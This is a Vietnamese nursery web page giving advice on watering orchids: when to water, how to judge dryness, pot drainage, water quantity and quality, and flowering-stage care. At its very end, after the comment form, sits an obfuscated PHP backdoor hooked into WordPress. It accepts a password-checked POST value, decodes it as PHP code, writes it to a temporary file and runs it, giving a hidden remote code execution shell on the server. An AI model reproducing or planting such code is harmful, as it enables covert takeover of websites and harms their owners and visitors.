Làm thế nào đê tưới nước cho Lan đúng cách

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cách tưới nước cho LanVới những người yêu thích cây cảnh thì hẳn không còn lạ lẫm với cây phong lan nữa, Tuy nhiên, đây vốn là loài cây hoang dã sống ở trong rừng, chính vì vậy, khi trồng cây, mọi người luôn gặp phải vấn dề là làm thế nào để tạo ra môi trường sống tốt nhất cho cây, chế độ chăm sóc cho Lan như thế nào để Lan có thể thích nghi được với môi trường không phải rừng mà vẫn sinh trưởng và tăng trưởng tốt.

Để tìm ra câu trả lời, hãy cùng theo dõi bài viết cách tưới nước cho Hoa Lan dưới đây của Vườn cây Hòa Bình.

>>>Xem thêm: Thông tin chi tiết về Vườn cây Hòa Bình.

Các định thời điểm phù hợp để tưới cây

Mọi người thường cho rằng, việc quan trọng nhất khi chăm sóc cây cảnh là phải thường xuyên tưới nước cho nó, như vậy mới giữ được độ tươi cho cây.

Tuy nhiên, đây là quan điểm hoàn toàn sai lầm, với cây Lan, chúng ta chỉ nên cung cấp cho nó một lượng nước vừa phải, đồng thời phải căn cứ vào từng thời điểm sống của cây Lan mà cho chế độ tưới sao cho phù hợp.

Cụ thể là:

  • Với những mùa khô hanh: cây sẽ cần bổ sung nước nhiều hơn.
  • vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat
  • Với những mùa ấm áp, có độ ẩm cao như mùa xuân: Chúng ta cần hạn chế tưới nước, chỉ đợi khi nào đất khô hẳn thì mới tưới, tránh trường hợp cây dư thừa nước, gây nên sự thối rữa ở cây.

Bên cạnh đó, ta cũng cần quan tâm đến khí hậu:

  • Nếu chậu cây lan tiếp xúc với một lượng lớn các tia nắng, cường độ tưới nước sẽ gia tăng.
  • Khi ở trong mát, chúng ta không cần quá thường xuyên tưới nước cho Lan.

Vậy, xác định được lưu lượng nước nên tưới cho cây, ta có thể làm thế nào để biết được khi nào cần tưới cây Lan?

Để biết được thời điểm nào trong ngày ây Lan cần cung cấp nước, chúng ta có thể quan sát giá thể của Phong lan, nếu giá thể khô hoặc bụi thì đây là thời điểm cây Lan cần bổ sung nước.

Căn cứ vào trọng lượng của cây phong lan cung giúp ta biết được phải tưới nước cho cây lan khi nào.

Theo đó, chậu cây nặng hơn khi cây Lan đang đủ hoặc dư thừa độ ẩm, không cần tưới. Nếu như chậu nhẹ, thì cần phải cung cấp thêm độ ẩm cho cây.

Một cách nữa để xác định liệu cây lan có cần tưới thêm nước không đó là sử dụng đầu ngón tay ấn nhẹ vào giá thể, nếu thấy khô thì cây cần phải tưới nước.

>>>Xem thêm: Ý nghĩa của cây hoa Alaska hoa vàng.

Bạn đã tưới nước cho phong lan đúng cách chưa?

Cách tưới lan đúng cách

Sai lầm lớn nhất trường khi trồng lan đó là sử dụng sai chậu để trồng, chậu được sử dụng để trồng lan là loại chậu có lỗ thoát nước.

Công dụng của lỗ này giúp cân bằng độ ẩm cho cây phong lan, giúp ta dễ dàng nhận biết được thời điểm tưới lan cũng như hạn chế được sự dư thừa lượng ẩm khiến cho Lan dễ bị thối rữa.

Như vậy, trước khi muốn tưới cây lan đúng cách, ta phải chọn đúng chậu để tưới đã.

Cách tưới lan đúng cách
Cách tưới lan đúng cách

Vậy tưới với liều lượng nào là đủ?

Nếu không xác định được lượng nước cần tưới cho Lan,chúng ta có thể sử dụng một cục nước đá, tương đương với 60ml nước, đặt lên giá thể của cây lan, sau đó để đá tan từ từ vào chậu lan.

Phương pháp thứ 2, đó là sử dụng vòi phun sương tưới cây cảnh, đây là loại vòi có khả năng điều khiển lượng nước, tạo ra các tia nước dạng sương, giúp cung cấp lượng ẩm vừa đủ cho cây cảnh.

>>>Xem thêm: Làm thế nào để trồng cây lưỡi hổ đúng cách.

Một vài lưu ý khi sử dụng nước để tưới cây cảnh phong lan

Chúng ta nên sử dụng nước ở nhiệt độ phòng, sử dụng nước mưa hoặc nước cất để tưới, không sử dụng các loại nước đã qua xử lý bằng hoá chất.

Trong quá trình tưới, không để nước đọng lại quá lâu trên các lá cây.

Kiểm tra lại giá thể và trọng lượng của chậu cây lan để cân đối lại nước lượng cần tưới.

Có hai thời điểm để tưới cây phong lan phù hợp nhất trong ngày, đó là sáng sớm hoặc chiều tối.

Một vài lưu ý khi sử dụng nước để tưới cây cảnh phong lan
Một vài lưu ý khi sử dụng nước để tưới cây cảnh phong lan

Sở dĩ có điều này là do khi tưới nước, cây cần thời gian để bốc hơi, đây chinh là thời gian thích hợp nhất để cây có thể hấp thụ lượng ẩm tốt nhất.

Bên cạnh đó, không nên tưới cây vào buổi tối, vì đây là thời gian quang hợp của cây, tưới vào thời điểm này không hề tốt cho phong lan.

Thêm vào đó, các giai đoạn sinh trưởng của Lan khác nhau, cây cũng sẽ cần lượng ẩm khác nhau.

Khi mới trồng cây: Đây là thời điểm cây cần bổ sung lượng nước tương đối nhiều. Khi cây lớn hơn, đặc biệt vào lúc ra hoa, thường là vào mùa thu và mùa đông: Chúng ta lại cần tiết chế lượng nước, vì thời điểm này cây đã có đủ lượng ẩm.

Ngoài ra, với những cây lan to, chúng ta nên tưới nhiều nước hơn các cây lan bé.

Nên chú ý gì khi chăm sóc phong Lan

Không nên sử dụng các loại phân bón cho cây cảnh tan trong nước, vì các loại phân này thường chứa khá nhiều muối, không hề tốt cho cây.

Không nên ngâm lan lâu ở trong nước, sẽ khiến lan bị chết nhanh, đấy cũng là lý do chúng ta phải dùng chậu chuyên biệt cho lan.

Nên chú ý gì khi chăm sóc phong Lan
Nên chú ý gì khi chăm sóc phong Lan

 

Khi tưới cây, nếu vô tình tưới nước lên hoa, các bông phong lan sẽ xuất hiện các đốm nhỏ, trông rất xấu, chính vì vậy, trong giai đoạn ra hoa của cây phong lan cần tránh khu vực này.

>>>Xem thêm: Cách chọn cây cảnh phù hợp với tuổi.

Với bài viết trên đây, Vườn cây Hòa Bình mong rằng bạn có thể có cho mình những mẹo riêng để chăm hoa lan hiệu quả hơn.

Nếu gặp các vấn đề, khó khăn trong quá trình chăm cây cảnh, hay chưa biết chọn loại cây cảnh nào phù hợp với gia đình mình, hãy liên hệ đến Vườn cây Hòa Bình qu hotline:, chúng tôi sẽ hỗ trợ tư vấn cho bạn.

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}